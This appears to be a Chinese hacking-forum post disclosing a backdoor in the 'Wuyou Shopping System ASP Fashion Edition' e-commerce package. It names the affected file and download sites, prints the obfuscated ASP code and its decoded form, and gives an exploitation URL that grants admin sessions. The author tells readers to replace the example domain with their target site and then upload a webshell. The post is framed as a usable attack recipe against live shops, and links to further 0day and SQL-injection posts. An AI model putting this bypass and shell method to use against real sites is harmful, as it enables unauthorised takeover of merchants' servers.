by 流浪的风
程序:无忧购物系统ASP时尚版
漏洞:存在后门,可直接登录拿shell,这后门不知道是本来就有还是另外别人添加的,以前的版本有没有这后门,我倒是没注意了
下载地址:以下两个地址下载的都有后门存在,其他网站的就没有看了
http://down.admin5.com/asp/3090.html
http://www.onlinedown.net/soft/85106.htm
后门存在文件:admin\xyvipSet.asp
前些天没事干,刚好看到"无忧购物系统ASP时尚版 V2011.1.19",这个版本貌似是新出来的,以前的版本我有看过,漏洞不少,这个版本呢?
刚好今天有时间,就下载过来看了下,没想到漏洞还没找到,后门倒是发现了一个,晕了,漏洞不找也罢,这么大的后门存在,还有什么好找的。。。
在xyvipSet.asp文件中,有一处地方加密了,我就奇怪了,整个程序都没加密,就这地方加密了,有什么奥妙?
“#@~^iQAAAA==@#@&kW,D;E/DcJmmOkKxEb{Jhm% Z!%r~Otx@#@&d+ddbWU`rCNskUE*'JACN T!RE@#@&d/kkW `rWVmoE#{F@#@&M+/aGxk+R"n[kM+1Y~JrU9+aRmdwr@#@&n NPrW@#@&pCYAAA==^#~@”
解密了一下,明文出来了
if request("action")="waj2008" then
session("admin")="waj2008"
session("flag")=1
response.Redirect "index.asp"
end if
汗,好嚣张的后门啊
利用方式:http://www.st999.cn/admin/xyvipset.asp?action=waj2008
把www.st999.cn替换成你的目标网站即可
进入后台的话,利用上传就可以拿shell了。
谁能给我个比较强大的关键字?
只显示10条记录相关文章
无忧购物系统ASP时尚版上传漏洞 (浏览: 10085, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12074, 评论: 0)
无忧购物系统oday发布 (浏览: 8747, 评论: 0)
无忧购物系统SQL注入漏洞 (浏览: 9171, 评论: 0)